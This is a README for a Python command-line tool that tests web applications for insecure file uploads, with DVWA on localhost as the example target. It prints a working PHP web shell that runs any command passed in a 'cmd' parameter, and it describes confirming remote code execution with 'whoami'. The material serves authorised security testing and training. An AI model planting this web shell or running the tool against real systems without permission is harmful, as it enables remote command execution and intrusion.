This is a simple yet effective CLI tool built in Python to detect insecure file upload vulnerabilities in web applications. It simulates the upload of a payload (like shell.php) to a target URL and checks if the file is accessible and potentially executable.
Useful for:
- Bug bounty hunters
- Web application testers
- CTF learners
- Anyone practicing ethical hacking
file-upload-vuln-tester/
βββ upload_tester.py # Main CLI tool
βββ shell.php # Sample test payload
βββ requirements.txt # Required Python packages
βββ README.md # Project documentation
βββ screenshots/ # Proof of exploitation
β βββ tool_run.png
β βββ browser_rce.png
β βββ dvwa_form.png
- Python 3.x
- requests
Install dependencies:
pip install -r requirements.txtpython3 upload_tester.py <upload_url> <file_path> --base <base_url>python3 upload_tester.py http://localhost/DVWA/vulnerabilities/upload/ shell.php --base http://localhost/DVWA/hackable/- Sends a POST request with a test file
- Checks common upload folders for the file (uploads/, files/, etc.)
- Verifies file access and optional RCE using
?cmd=whoami
<?php
if(isset($_REQUEST['cmd'])){
system($_REQUEST['cmd']);
}
?>Upload this to simulate a remote shell
- Helps automate a real-world vulnerability test
- Trains for bug bounty methodology
- Demonstrates scripting and scanning skills
This tool is for educational and ethical testing only. Do not use it on systems you do not own or have explicit permission to test.
[Your Name Here] Feel free to connect with me on LinkedIn or contribute to the tool!
MIT License